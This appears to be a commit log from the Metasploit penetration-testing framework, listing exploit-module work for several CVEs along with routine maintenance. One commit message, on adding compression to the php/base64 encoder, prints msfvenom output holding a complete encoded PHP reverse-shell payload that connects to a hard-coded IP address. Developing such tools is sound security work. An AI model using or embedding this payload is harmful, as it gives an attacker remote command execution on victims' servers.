Chocapikk
eaf5661896
Lint
2024-08-19 19:27:29 +02:00
h4x-x0r
9690f01df6
code cleanup
...
code cleanup
2024-08-19 16:25:50 +01:00
Metasploit
d6a03b29bb
automatic module_metadata_base.json update
2024-08-19 03:40:02 -05:00
dledda-r7
afd0f1974b
Land #19373 , Fortra FileCatalyst Workflow SQL Injection
2024-08-19 04:10:58 -04:00
Valentin Lobstein
f65ccbec73
Update modules/exploits/multi/http/spip_porte_plume_previsu_rce.rb
...
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com >
2024-08-18 21:23:59 +02:00
Valentin Lobstein
6ad0b56099
Update modules/exploits/multi/http/spip_porte_plume_previsu_rce.rb
...
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com >
2024-08-18 21:22:16 +02:00
Valentin Lobstein
718c215b96
Update modules/exploits/multi/http/spip_porte_plume_previsu_rce.rb
...
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com >
2024-08-18 21:22:09 +02:00
cn-kali-team
d5fbfaf775
set the default type to ssh
2024-08-18 16:53:09 +08:00
cn-kali-team
cd21e57576
fix window appdata path
2024-08-18 16:45:36 +08:00
jheysel-r7
c982aabaa3
Minor update
2024-08-16 12:17:56 -07:00
cn-kali-team
57a327a9f4
doc
2024-08-16 23:40:04 +08:00
h4x-x0r
82f51bb9b7
code cleanup
...
code cleanup
2024-08-16 15:43:34 +01:00
h4x-x0r
5a94869809
cleanup
...
cleanup
2024-08-16 14:12:41 +01:00
h4x-x0r
3577ae8ffb
Code cleanup
...
Code cleanup
2024-08-16 13:57:38 +01:00
cn-kali-team
c4c58e466d
doc
2024-08-16 20:07:16 +08:00
cn-kali-team
1127225363
electerm
2024-08-16 20:04:57 +08:00
Chocapikk
3d90eb0f43
Add spip_porte_plume_previsu_rce
2024-08-16 10:50:23 +02:00
h4x-x0r
8ad328a510
Code cleanup
...
Code cleanup
2024-08-16 07:07:16 +01:00
Takah1ro
209f172aa1
Update document
2024-08-16 08:56:01 +09:00
Takah1ro
7258ca4fb1
Remove unnecessary option for simplicity
2024-08-16 08:49:34 +09:00
Takah1ro
eeab7ce2a2
Proceed when user specified cmd fails
2024-08-16 08:23:50 +09:00
jheysel-r7
ea10360c81
Update OFBiz ProgramExport RCE for Patch Bypass
2024-08-15 09:18:15 -07:00
Metasploit
e4726e4f52
Bump version of framework to 6.4.23
2024-08-15 03:40:21 -05:00
Takah1ro
ea1b9e925e
Delete old three exploits in one module
2024-08-15 08:17:36 +09:00
h4x-x0r
947cefe43a
Fixed get_cookies
...
Fixed get_cookies
2024-08-14 17:42:11 +01:00
h4x-x0r
765e9b9ae4
Improved error handling
...
Improved error handling
2024-08-14 17:25:36 +01:00
Metasploit
5e11dee27e
automatic module_metadata_base.json update
2024-08-14 10:22:19 -05:00
cgranleese-r7
dbc51d1cd4
Land #19347 , OpenMetadata authentication bypass and SpEL injection exploit chain[CVE-2024-28255 and CVE-2024-28254]
2024-08-14 16:06:10 +01:00
Metasploit
4e2dda3562
automatic module_metadata_base.json update
2024-08-14 09:42:31 -05:00
dledda-r7
f211fcb6a6
Land #19370 , LG Simple Editor Command Injection
2024-08-14 10:22:29 -04:00
Metasploit
024af65c2a
automatic module_metadata_base.json update
2024-08-14 04:30:49 -05:00
cgranleese-r7
36322ff274
Land #19348 , Apache HugeGraph Gremlin RCE (CVE-2024-27348)
2024-08-14 10:06:21 +01:00
h4x-x0r
ea2b5920ac
cleanup
...
cleanup
2024-08-14 06:44:43 +01:00
h4x-x0r
9c72a85134
Verified more versions
...
Verified exploit against more affected versions
2024-08-14 06:33:45 +01:00
h4x-x0r
75201b0892
Updated references
...
references, affected versions, credits
2024-08-14 05:15:36 +01:00
h4x-x0r
7bfc386973
Updated
...
added error handling, documentation, version check, store_valid_credential
2024-08-14 04:57:08 +01:00
h4x-x0r
be62cc97a7
Auth Bypass
...
Auth Bypass
2024-08-14 02:00:06 +01:00
h4x-x0r
17149db5a3
code cleanup
...
code cleanup
2024-08-13 23:23:35 +01:00
h4x-x0r
b96bc116f5
Code cleanup
...
Code cleanup
2024-08-13 23:18:26 +01:00
h4x-x0r
c53e5d3c4e
Code cleanup and added store_valid_credential
...
added store_valid_credential
code cleanup
2024-08-13 23:12:50 +01:00
h4x-x0r
733e2ab9fc
Added store_valid_credential
...
Added store_valid_credential
2024-08-13 23:00:13 +01:00
jvoisin
18ee2cde77
Add the possibility the compress the payload in encoders/php/base64
...
Without compression:
```console
$ ./msfvenom -p php/reverse_php -e php/base64
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of php/base64
php/base64 succeeded with size 4040 (iteration=0)
php/base64 chosen with final size 4040
Payload size: 4040 bytes
eval(base64_decode('ICAgIC8qPD9waHAgLyoqLwogICAgICBAZXJyb3JfcmVwb3J0aW5nKDApO0BzZXRfdGltZV9saW1pdCgwKTtAaWdub3JlX3VzZXJfYWJvcnQoMSk7QGluaV9zZXQoJ21heF9leGVjdXRpb25fdGltZScsMCk7CiAgICAgICRkaXM9QGluaV9nZXQoJ2Rpc2FibGVfZnVuY3Rpb25zJyk7CiAgICAgIGlmKCFlbXB0eSgkZGlzKSl7CiAgICAgICAgJGRpcz1wcmVnX3JlcGxhY2UoJy9bLCBdKy8nLCcsJywkZGlzKTsKICAgICAgICAkZGlzPWV4cGxvZGUoJywnLCRkaXMpOwogICAgICAgICRkaXM9YXJyYXlfbWFwKCd0cmltJywkZGlzKTsKICAgICAgfWVsc2V7CiAgICAgICAgJGRpcz1hcnJheSgpOwogICAgICB9CiAgICAgIAogICAgJGlwYWRkcj0nMTAwLjExOS4xOTcuMjEnOwogICAgJHBvcnQ9NDQ0NDsKCiAgICBpZighZnVuY3Rpb25fZXhpc3RzKCdlbXJvckVjdFlWZWYnKSl7CiAgICAgIGZ1bmN0aW9uIGVtcm9yRWN0WVZlZigkYyl7CiAgICAgICAgZ2xvYmFsICRkaXM7CiAgICAgICAgCiAgICAgIGlmIChGQUxTRSAhPT0gc3RyaXN0cihQSFBfT1MsICd3aW4nICkpIHsKICAgICAgICAkYz0kYy4iIDI.chr(43).JjFcbiI7CiAgICAgIH0KICAgICAgJER5Rk89J2lzX2NhbGxhYmxlJzsKICAgICAgJGVrTXV5WkY9J2luX2FycmF5JzsKICAgICAgCiAgICAgIGlmKCREeUZPKCdwb3BlbicpJiYhJGVrTXV5.WkYoJ3BvcGVuJywkZGlzKSl7CiAgICAgICAgJGZwPXBvcGVuKCRjLCdyJyk7CiAgICAgICAgJG89TlVMTDsKICAgICAgICBpZihpc19yZXNvdXJjZSgkZnApKXsKICAgICAgICAgIHdoaWxlKCFmZW9mKCRmcCkpewogICAgICAgICAgICAkby49ZnJlYWQoJGZwLDEwMjQpOwogICAgICAgICAgfQogICAgICAgIH0KICAgICAgICBAcGNsb3NlKCRmcCk7CiAgICAgIH1lbHNlCiAgICAgIGlmKCREeUZPKCdzaGVsbF9leGVjJykmJiEkZWtNdXlaRignc2hlbGxfZXhlYycsJGRpcykpewogICAgICAgICRvPWAkY2A7CiAgICAgIH1lbHNlCiAgICAgIGlmKCREeUZPKCdwcm9jX29wZW4nKSYmISRla011eVpGKCdwcm9jX29wZW4nLCRkaXMpKXsKICAgICAgICAkaGFuZGxlPXByb2Nfb3BlbigkYyxhcnJheShhcnJheSgncGlwZScsJ3InKSxhcnJheSgncGlwZScsJ3cnKSxhcnJheSgncGlwZScsJ3cnKSksJHBpcGVzKTsKICAgICAgICAkbz1OVUxMOwogICAgICAgIHdoaWxlKCFmZW9mKCRwaXBlc1sxXSkpewogICAgICAgICAgJG8uPWZyZWFkKCRwaXBlc1sxXSwxMDI0KTsKICAgICAgICB9CiAgICAgICAgQHByb2NfY2xvc2UoJGhhbmRsZSk7CiAgICAgIH1lbHNlCiAgICAgIGlmKCREeUZPKCdleGVjJykmJiEkZWtNdXlaRignZXhlYycsJGRpcykpewogICAgICAgICRvPWFycmF5KCk7CiAgICAgICA.gZXhlYygkYywkbyk7CiAgICAgICAgJG89am9pbihjaHIoMTApLCRvKS5jaHIoMTApOwogICAgICB9ZWxzZQogICAgICBpZigkRHlGTygnc3lzdGVtJykmJiEkZWtNdXlaRignc3lzdGVtJywkZGlzKSl7CiAgICAgICAgb2Jfc3RhcnQoKTsKICAgICAgICBzeXN0ZW0oJGMpOwogICAgICAgICRvPW9iX2dldF9jb250ZW50cygpOwogICAgICAgIG9iX2VuZF9jbGVhbigpOwogICAgICB9ZWxzZQogICAgICBpZigkRHlGTygncGFzc3RocnUnKSYmISRla011eVpGKCdwYXNzdGhydScsJGRpcykpewogICAgICAgIG9iX3N0YXJ0KCk7CiAgICAgICAgcGFzc3RocnUoJGMpOwogICAgICAgICRvPW9iX2dldF9jb250ZW50cygpOwogICAgICAgIG9iX2VuZF9jbGVhbigpOwogICAgICB9ZWxzZQogICAgICB7CiAgICAgICAgJG89MDsKICAgICAgfQogICAgCiAgICAgICAgcmV0dXJuICRvOwogICAgICB9CiAgICB9CiAgICAkbm9mdW5jcz0nbm8gZXhlYyBmdW5jdGlvbnMnOwogICAgaWYoaXNfY2FsbGFibGUoJ2Zzb2Nrb3BlbicpYW5kIWluX2FycmF5KCdmc29ja29wZW4nLCRkaXMpKXsKICAgICAgJHM9QGZzb2Nrb3BlbigidGNwOi8vMTAwLjExOS4xOTcuMjEiLCRwb3J0KTsKICAgICAgd2hpbGUoJGM9ZnJlYWQoJHMsMjA0OCkpewogICAgICAgICRvdXQgPSAnJzsKICAgICAgICBpZihzdWJzdHIoJG.MsMCwzKSA9PSAnY2QgJyl7CiAgICAgICAgICBjaGRpcihzdWJzdHIoJGMsMywtMSkpOwogICAgICAgIH0gZWxzZSBpZiAoc3Vic3RyKCRjLDAsNCkgPT0gJ3F1aXQnIHx8IHN1YnN0cigkYywwLDQpID09ICdleGl0JykgewogICAgICAgICAgYnJlYWs7CiAgICAgICAgfWVsc2V7CiAgICAgICAgICAkb3V0PWVtcm9yRWN0WVZlZihzdWJzdHIoJGMsMCwtMSkpOwogICAgICAgICAgaWYoJG91dD09PWZhbHNlKXsKICAgICAgICAgICAgZndyaXRlKCRzLCRub2Z1bmNzKTsKICAgICAgICAgICAgYnJlYWs7CiAgICAgICAgICB9CiAgICAgICAgfQogICAgICAgIGZ3cml0ZSgkcywkb3V0KTsKICAgICAgfQogICAgICBmY2xvc2UoJHMpOwogICAgfWVsc2V7CiAgICAgICRzPUBzb2NrZXRfY3JlYXRlKEFGX0lORVQsU09DS19TVFJFQU0sU09MX1RDUCk7CiAgICAgIEBzb2NrZXRfY29ubmVjdCgkcywkaXBhZGRyLCRwb3J0KTsKICAgICAgQHNvY2tldF93cml0ZSgkcywic29ja2V0X2NyZWF0ZSIpOwogICAgICB3aGlsZSgkYz1Ac29ja2V0X3JlYWQoJHMsMjA0OCkpewogICAgICAgICRvdXQgPSAnJzsKICAgICAgICBpZihzdWJzdHIoJGMsMCwzKSA9PSAnY2QgJyl7CiAgICAgICAgICBjaGRpcihzdWJzdHIoJGMsMywtMSkpOwogICAgICAgIH0gZWxzZSBpZiAoc3Vic3RyKCRjLDAsNCkgPT0gJ3F1a.XQnIHx8IHN1YnN0cigkYywwLDQpID09ICdleGl0JykgewogICAgICAgICAgYnJlYWs7CiAgICAgICAgfWVsc2V7CiAgICAgICAgICAkb3V0PWVtcm9yRWN0WVZlZihzdWJzdHIoJGMsMCwtMSkpOwogICAgICAgICAgaWYoJG91dD09PWZhbHNlKXsKICAgICAgICAgICAgQHNvY2tldF93cml0ZSgkcywkbm9mdW5jcyk7CiAgICAgICAgICAgIGJyZWFrOwogICAgICAgICAgfQogICAgICAgIH0KICAgICAgICBAc29ja2V0X3dyaXRlKCRzLCRvdXQsc3RybGVuKCRvdXQpKTsKICAgICAgfQogICAgICBAc29ja2V0X2Nsb3NlKCRzKTsKICAgIH0K'));
$
```
With compression:
```console
$ ./msfvenom -p php/reverse_php -e php/base64
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of php/base64
php/base64 succeeded with size 1617 (iteration=0)
php/base64 chosen with final size 1617
Payload size: 1617 bytes
eval(gzuncompress(base64_decode('eJztVm1v2zYQ.chr(47).p5fQRtCSGWabaUGts7jlqBIsaFZE8zZh64rWJk6xWxlUiUpxEbb.chr(47).z5QbxYtdykw7NtswLLvnjvdPffoaIQQmp79.chr(43).HOxLtD07Gx6gqrXBWitNNNQKG2FvCezcHFhwDIrNsBysRG2Mol7qTSw0oBmyUppS2JnlYIZsARvki2DLfDSCiWrWBzNwkVzkyAVhlbgewdOhUlWObCslNzhDe6QIiMj2BR2R1xMGH5s7E2OQsO9qzVPOBA8fR2hN99MceTeFX7hw2Fb5CoF8iV.chr(47).onWyY5ukINhqsTkAfYbcwMcjEWQPaa7VJRBFkqaa4ng2m8Tx00n89LvJeYxrcOAIpvP5fL44OWlbbRlgsBXGGoJ3Lwp79QHvG28RqPaQgPc4uc.chr(47).VKsmryvaddUwi8vzyenmFRpQiY7UwVpPbX27ZzTJC.chr(43).EFIjMIQ9frjNOCTMTr.chr(47).6TT.chr(43).S44PWwzyd6.chr(47).ubhTFwjCe5LmbIO4G.chr(47).OftK7WjWEhWMdQ59mNt4gl2MsHh6emoDmoM0WDe6pBshBySBDwKVH.chr(43).Sir5TQhK.chr(43).1iSehc45ab57kzxSillDnrNBQT3zsbLeBvztY5kLrThTBUgv8d46zLtOZJoD7SCuz5qA.chr(43).hMXogAcYY3DyLc8HLOEUeB.chr(43).GJ.chr(43).ol39cX.chr(43).8ND2uRAxlloDJSo1.chr(47).Hb.chr(47).pFuZgJzTQk6R4QxbPzeS.chr(47).t5.chr(43).7bRVU8z5UB0vTz.chr(43).Ah2xsLGp782DShSK2Zsom1fETXWPRVen2rlNg3jSlqQ1vQj1IqBTBnPIZHk0fKKxBi71qU.chr(47).xtb4VSW26P.chr(43).wyKHQviCyrKBFKy6npH8Qh8iIMEyDUaXmQIKs8JXhiefQ6QknKw4l0xdNXz6NdLLiaMveQzjz91Pn0mBLLVGgfH.chr(47).9GUjl9qmhWKpqmaD9.EbRol3JvvxGcGcXf1.chr(47).QmMh21.chr(43).63vOGA5MPSic5Kx5cUP06l.chr(47).Ioyj6jDomqypDHhLmInOZ.chr(47).Pv.chr(47).a1TWkQRxt58TLlyOz3g0Sx6EiJKEeYpwt4k.chr(43).DoVuod8En0bh.chr(47).2nFzmGq9Oin25ep.chr(47).tQCovRp0.chr(47).oiA.chr(43).2wuL.chr(43).AYLQSkPyvpfbP0DrNmhzkPUz.chr(43).iXV4nZQSrMkN3AgrexBCwuOpnaeXvCgjONq62VRpR2c6FmjxTa314ubsRuxe3o1JBbI5XP268uru2h58.chr(43).wFW979fnX5W7S8uWZ3z2671F2IkhK4rW5d.chr(47).2U40EML7CocezcbD4XTRvyvn6.chr(47).Qz4DefyOjYTJV2shYnbst65Q1kFangwOFnfwNAM8OCw')));
$
```
Let's not enable it by default as it relies on having php compiled with zlib by
default, which might not be available on come exotic setups.
2024-08-13 23:10:04 +02:00
h4x-x0r
14e4a11d24
Added store_valid_credential
...
Added store_valid_credential
2024-08-13 20:54:56 +01:00
Spencer McIntyre
e812463d5f
Add some better formatting
2024-08-13 15:48:41 -04:00
h4x-x0r
39d615e8d2
Added TARGETURI option
...
Added TARGETURI option
2024-08-13 20:29:30 +01:00
jheysel-r7
47e5d62ade
Update modules/exploits/linux/http/apache_hugegraph_gremlin_rce.rb
2024-08-13 08:48:33 -07:00
jheysel-r7
e04e22bc30
Apply suggestions from code review
2024-08-13 08:40:20 -07:00
adeherdt-r7
a3a24418a8
MS-9517 Jenkins Login Scanner
...
Jenkins does not implement Authentication challenges.
By default, Jenkins responds with a HTTP 403 FORBIDDEN response, and does not include the `WWW-Authenticate` header.
This causes problems with the underlying http client, as this one expects the challenge to come forward and resend
the request with the auth header.
By changing the code to look for the HTTP 403 response, and setting the default URL to the correct login validation endpoint
Pro will have an easier time to investigate whether Jenkins can be bruteforced or not.
The original code checks for a 401 response only.
Overwriting the behavior for Jenkins allows us to handle this use-case properly and report the correct behavior.
2024-08-13 11:16:01 +02:00
Takah1ro
38b9278f42
Add document
2024-08-12 09:21:18 +09:00
h4x-x0r
26d6347919
Code cleanup
...
Code cleanup
2024-08-11 06:15:24 +01:00
h4x-x0r
5fa18a66ee
Control iD iDSecure Authentication Bypass (CVE-2023-6329) Module
...
Control iD iDSecure Authentication Bypass (CVE-2023-6329) Module
2024-08-11 05:41:07 +01:00
Takah1ro
79f5c8ed3d
Remove HttpUsername and HttpPassword options
2024-08-10 12:06:20 +09:00
Takah1ro
be4764885a
Fix and Rubocop formatting
2024-08-10 12:01:32 +09:00
Takah1ro
0ffe335660
Add module docs
2024-08-10 10:59:00 +09:00
h4x-x0r
8a72124e9d
Code cleanup and error handling added
...
Code cleanup and error handling added
2024-08-09 21:11:20 +01:00
jvoisin
d28fb4cbb6
Fix php/base64 encoder
...
Having things like `'abcde.chr(43).fgh'` doesn't fly, but `'abcde'.chr(43).'fgh'` does.
2024-08-09 12:07:39 -07:00
h4x-x0r
4384d32c83
Cisco SSM On-Prem Account Takeover (CVE-2024-20419)
...
Cisco SSM On-Prem Account Takeover (CVE-2024-20419)
2024-08-09 18:59:54 +01:00
Takah1ro
cf15124cc8
Add not null check
2024-08-09 15:34:14 +09:00
Takah1ro
2363f8416c
Fix Reliability
2024-08-09 12:57:01 +09:00
Takah1ro
c36c2eea38
Separate modules
2024-08-09 08:51:14 +09:00
h4x-x0r
8bef9b5f72
Fortra FileCatalyst Workflow SQL Injection (CVE-2024-5276)
...
Fortra FileCatalyst Workflow SQL Injection (CVE-2024-5276)
2024-08-08 17:52:38 +01:00
Metasploit
233f6dc4d2
Bump version of framework to 6.4.22
2024-08-08 03:38:47 -05:00
Takah1ro
064d463c37
Formatting doc
2024-08-08 07:45:16 +09:00
Metasploit
6fcd06b36d
automatic module_metadata_base.json update
2024-08-07 17:11:51 -05:00
bwatters
baca8723c1
Land #19357 , Calibre Python Code Injection (CVE-2024-6782)
...
Merge branch 'land-19357' into upstream-master
2024-08-07 16:46:16 -05:00
h4x-x0r
8e4503061a
Removed debugging code
...
Removed debugging code
2024-08-07 15:23:15 +01:00
Takah1ro
35354c8407
Update document
2024-08-07 21:20:09 +09:00
Takah1ro
a92b51904a
Update document
2024-08-07 21:16:32 +09:00
h4x-x0r
8732d7cd58
LG Simple Editor Command Injection (CVE-2023-40504) Module
...
Exploit Module and Documentation for the LG Simple Editor Command Injection (CVE-2023-40504)
2024-08-07 05:16:25 +01:00
Takah1ro
1f68919a42
Fail if optional but required option not set
2024-08-07 13:01:23 +09:00
Takah1ro
f168246796
Correct vulnerable version
...
<=v2.6.3 == <v2.8.1
2024-08-07 12:49:17 +09:00
Takah1ro
a57678c8d3
Formatting
2024-08-07 08:51:22 +09:00
Takah1ro
4e99e7dfe7
Use Vulnerable when lfi
2024-08-07 08:50:42 +09:00
Takah1ro
92e2694ac5
Use Detected instead of Appears
2024-08-07 08:46:44 +09:00
Takah1ro
b7e4247d22
Avoid using CVE as option
2024-08-07 08:43:57 +09:00
Takah1ro
c71894f3c4
Remove unnecessary DefaultOptions
2024-08-07 08:21:15 +09:00
h00die-gr3y
8b3392a756
changed check to Appears when vulnerable
2024-08-06 21:00:06 +00:00
Corey
2437000b99
Rubocop changes
2024-08-06 15:23:03 -04:00
dwelch-r7
f3214d67db
Land #19355 , Fix migrate to pass the debug_build flag
2024-08-06 17:21:16 +01:00
Zach Goldman
29bfc1cca6
add necessary metadata for bruteforce
2024-08-06 10:02:58 -05:00
Ivan Nikolskiy
be90a4e3fd
Restore r0 on each iteration
2024-08-06 00:01:58 +02:00
Ivan Nikolskiy
ae8e996c46
Restore r0 on each iteration
2024-08-06 00:01:06 +02:00
Ivan Nikolskiy
9436e0011f
Put sockfd to r0
...
r0 has return value instead of sockfd in second loop interation
2024-08-05 23:51:22 +02:00
Spencer McIntyre
a1a59cff78
Load from the user's module store
2024-08-05 12:31:51 -04:00
Spencer McIntyre
233cd61c86
Check dependencies when loading
2024-08-05 12:07:57 -04:00
Spencer McIntyre
32d242c5d2
Initial commit of the fzuse plugin
2024-08-05 10:50:18 -04:00
dwelch-r7
8fa437eda4
Land #19365 , Update pcaprub dependency to 0.13.3
2024-08-05 12:22:48 +01:00
adfoster-r7
21cb88e510
Update pcaprub dependency to 0.13.3
2024-08-05 11:59:25 +01:00
Takah1ro
b487dadf8c
Remove explicit return
2024-08-05 13:01:11 +09:00
Takah1ro
ab38c83d9c
Update module document
2024-08-05 08:51:56 +09:00
Takah1ro
93f1362d22
Add module document
2024-08-05 08:47:29 +09:00
Takah1ro
0251f1bd8d
Rubocop formatting
2024-08-04 22:10:15 +09:00
Takah1ro
729ecc588a
Formatting lfi output
2024-08-04 22:07:53 +09:00
Takah1ro
ca0dba1844
Add LFI
2024-08-04 22:02:37 +09:00
Takah1ro
a5009cd5ff
Add RCE
2024-08-04 21:43:17 +09:00
Takah1ro
7a233f0049
Update CVE-2023-6019 module
2024-08-04 21:07:05 +09:00
Takah1ro
122767cc59
Implement CVE-2023-6019 module
2024-08-04 10:49:11 +09:00
h4x-x0r
1390251e87
Code cleanup
...
Updated code for version detection and exploit invocation
2024-08-03 05:13:33 +01:00
h00die-gr3y
8f0d22ded4
Fourth release module and documentation
2024-08-02 21:04:50 +00:00
Jack Heysel
75c737dabe
Responded to comments
2024-08-02 10:47:53 -07:00
Corey
6c7c1cf603
Fix missing comma in opts, remove dbugging in plist_path
2024-08-02 12:19:55 -04:00
Corey
9036132b18
Update targets to include apple silicon (AARCH64)
2024-08-02 12:05:23 -04:00
h4x-x0r
35cbf63890
Minor fixes
...
Specified a default payload
Randomized date and time
Wrapped cleanup in an ensure block
2024-08-02 16:58:24 +01:00
h4x-x0r
2ce0a7a3fd
v7.15 Support added
...
Updated to work with v7.15 too.
2024-08-02 15:43:26 +01:00
Corey
94d4e17d3e
Use optenum properly
2024-08-02 10:19:50 -04:00
h4x-x0r
4e8f27b70e
Merge branch 'my_awesome_branch' of https://github.com/h4x-x0r/metasploit-framework into my_awesome_branch
2024-08-02 06:18:57 +01:00
h4x-x0r
c8eb919af8
rm calibre
...
rm calibre
2024-08-02 06:18:34 +01:00
h4x-x0r
7784448995
Delete modules/exploits/multi/misc/calibre_exec.rb
2024-08-02 00:16:01 -05:00
h4x-x0r
2b8f52bed6
Delete documentation/modules/exploit/multi/misc/calibre_exec.md
2024-08-02 00:15:16 -05:00
h4x-x0r
6dbb264a0d
Calibre Python Code Injection (CVE-2024-6782)
...
New Exploit Module for Calibre Python Code Injection (CVE-2024-6782)
2024-08-02 06:03:15 +01:00
h4x-x0r
025354b0ef
Calibre Python Code Injection (CVE-2024-6782)
...
Exploit Module for Calibre Python Code Injection (CVE-2024-6782)
2024-08-02 05:56:46 +01:00
h4x-x0r
7bafe1cabc
Delete modules/exploits/multi/misc/calibre_exec.rb
2024-08-01 23:30:31 -05:00
h4x-x0r
6e3f95fd3a
Delete documentation/modules/exploit/multi/misc/calibre_exec.md
2024-08-01 23:29:34 -05:00
h4x-x0r
80961b0fef
Merge branch 'rapid7:master' into my_awesome_branch
2024-08-01 22:57:36 -05:00
h4x-x0r
6aa4d2e806
Documentation for Exploit Module Calibre Python Code Injection (CVE-2024-6782)
2024-08-01 23:56:33 -04:00
h4x-x0r
1fbeb4e223
Exploit Module for Calibre Python Code Injection (CVE-2024-6782)
2024-08-01 23:55:47 -04:00
Adithya Chiluka
28535ae277
Update README.md
2024-08-01 22:39:42 +05:30
Corey
133e6db77e
Add dynamic plist path from opts
2024-08-01 11:54:38 -04:00
Corey
f3d935ef07
add references to Objective-See and Apple Docs
2024-08-01 11:49:11 -04:00
Corey
7da83a1358
Add opts, update description for daemons
2024-08-01 11:47:29 -04:00
dledda-r7
bcbbc91621
fix(core): fix migrate to pass the debug_build flag.
...
Co-authored-by: dwelch-r7 <dean_welch@rapid7.com >
2024-08-01 09:27:12 -04:00
Metasploit
52fb857b99
Bump version of framework to 6.4.21
2024-08-01 03:40:03 -05:00
h00die-gr3y
75b3afb0ce
Third release module and documentation
2024-07-31 14:34:44 +00:00
Metasploit
951a33082d
automatic module_metadata_base.json update
2024-07-31 09:02:53 -05:00
dledda-r7
48c69b99fb
Land #19344 , FortiClient EMS FCTID SQLi to RCE fix for 7.2.x
2024-07-31 09:43:19 -04:00
Metasploit
4b8e2b6b1a
automatic module_metadata_base.json update
2024-07-31 06:08:41 -05:00
Christophe De La Fuente
24c8a2bf5f
Land #19331 , Update empire_skywalker module
2024-07-31 12:27:06 +02:00
Takah1ro
4f061c87fb
Update document
2024-07-31 15:43:03 +09:00
Takah1ro
ca75714959
Change all instance of staging_key to @staging_key
2024-07-31 12:54:09 +09:00
Takah1ro
a7512f70eb
Change all instance of staging_key to @staging_key
2024-07-31 08:47:07 +09:00
Takah1ro
53d74f0777
Use a multi-line string
...
instead of a big number on one line
2024-07-31 08:27:35 +09:00
Takahiro Yokoyama
1c28150514
Update modules/exploits/linux/http/empire_skywalker.rb
...
add prepend Msf::Exploit::Remote::AutoCheck at the beginning of the class
Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com >
2024-07-31 08:11:44 +09:00
Takahiro Yokoyama
6f4ff80a38
Update modules/exploits/linux/http/empire_skywalker.rb
...
formatting issue
Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com >
2024-07-31 08:09:40 +09:00
Takahiro Yokoyama
a35a2c1814
Update modules/exploits/linux/http/empire_skywalker.rb
...
formatting issue
Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com >
2024-07-31 08:08:25 +09:00
Takahiro Yokoyama
13f5d971ed
Update modules/exploits/linux/http/empire_skywalker.rb
...
use a multi-line string instead of a big number on one line
Co-authored-by: Christophe De La Fuente <56716719+cdelafuente-r7@users.noreply.github.com >
2024-07-31 08:04:39 +09:00
h4x-x0r
2d9aed7ec3
fixed typo
2024-07-30 13:39:03 -04:00
h4x-x0r
341142dc23
DIAEnergie SQL Injection (CVE-2024-4548) Module
2024-07-30 13:28:10 -04:00
h4x-x0r
cd1c100bd8
DIAEnergie SQL Injection (CVE-2024-4548) Module Documentation
2024-07-30 13:21:34 -04:00
Jack Heysel
d7ae1b5463
Minor fixes
2024-07-30 09:19:12 -07:00
Metasploit
e600f199ac
automatic module_metadata_base.json update
2024-07-30 11:08:13 -05:00
Christophe De La Fuente
ba7c7b6456
Land #19298 , OpenMediaVault authenticated RCE [CVE-2013-3632]
2024-07-30 17:40:39 +02:00
Jack Heysel
075ce28c5a
Base64 encoded ARCH_CMD payload
2024-07-30 08:19:08 -07:00
Jack Heysel
464f0b2d48
Apache HugeGraph Gremlin RCE (CVE-2024-27348)
2024-07-29 14:08:38 -07:00
h00die-gr3y
b3ce0ad4ed
Second release module and documentation
2024-07-29 16:15:17 +00:00
h00die-gr3y
e11e8cdd74
first release module
2024-07-29 14:48:00 +00:00
h00die-gr3y
c94dc8f28c
changes based on cdelafuente-r7 comments
2024-07-29 14:02:29 +00:00
Takah1ro
706dc60f6e
Use built-in Diffie-Hellman
2024-07-27 12:13:52 +09:00
Takahiro Yokoyama
598498832c
Merge branch 'rapid7:master' into master
2024-07-27 09:21:28 +09:00
redwaysecurity.com
a812617fee
Removed "ssl_restore = true"
2024-07-26 17:30:25 +02:00
Takah1ro
ebcd7e0e33
rubocop formatting
2024-07-26 23:44:46 +09:00
h00die-gr3y
2175af9c3f
update with Msf::Exploit::Deprecated mixin
2024-07-26 14:28:53 +00:00
Metasploit
45e105e219
automatic module_metadata_base.json update
2024-07-26 09:26:42 -05:00
dledda-r7
2989c9ed1b
Land #19337 , MySCADA MyPRO Command Injection module
2024-07-26 10:07:19 -04:00
Takahiro Yokoyama
d5ce191ceb
Merge branch 'rapid7:master' into master
2024-07-26 21:51:30 +09:00
Takah1ro
393aed445d
Formatting
2024-07-26 21:14:51 +09:00
Takah1ro
b5c4fd0e32
use the same instance
...
OpenSSL::Digest.new('sha256')
2024-07-26 21:05:59 +09:00
Takah1ro
5ee86967e5
Pass a Hash as argument
2024-07-26 20:59:54 +09:00
Takah1ro
bff7e48e3c
Avoid code duplication
2024-07-26 20:44:18 +09:00
Takah1ro
10b723751b
Avoid code duplication
2024-07-26 13:11:26 +09:00
h4x-x0r
14945679ba
Updated email generation part.
2024-07-25 23:54:27 -04:00
Takah1ro
0b9b7a49e7
Add response check
2024-07-26 08:48:45 +09:00
Takah1ro
b0689971b6
Fix to_bytes
2024-07-26 08:38:14 +09:00
Takah1ro
ed0720dcfd
Separate write_file function
2024-07-26 08:32:32 +09:00
Takah1ro
ae95bb6c0f
Fix build_routing_packet
2024-07-26 08:22:57 +09:00
Takah1ro
b1e304a61f
Fix match
2024-07-26 08:16:30 +09:00
Heyder Andrade
10e4668e68
Update lib/msf/core/exploit/remote/http_server.rb
...
Co-authored-by: Simon Janusz <85949464+sjanusz-r7@users.noreply.github.com >
2024-07-25 19:05:48 +02:00
Jack Heysel
2ffe027eab
Responded to comments
2024-07-25 09:14:27 -07:00
Metasploit
65c5680238
automatic module_metadata_base.json update
2024-07-25 08:38:18 -05:00
adfoster-r7
b70652df93
Land #19343 , Update rubocop target ruby version
2024-07-25 14:12:20 +01:00
Metasploit
03ef015f61
Bump version of framework to 6.4.20
2024-07-25 03:37:00 -05:00
h4x-x0r
d3c2177228
Merge branch 'my_awesome_branch' of github.com:h4x-x0r/metasploit-framework into my_awesome_branch
2024-07-24 23:50:18 -04:00
h4x-x0r
c0c81475aa
Merge branch 'master' of github.com:h4x-x0r/metasploit-framework into my_awesome_branch
2024-07-24 23:48:00 -04:00
h4x-x0r
90ed8ae797
Revised the code to make it cleaner
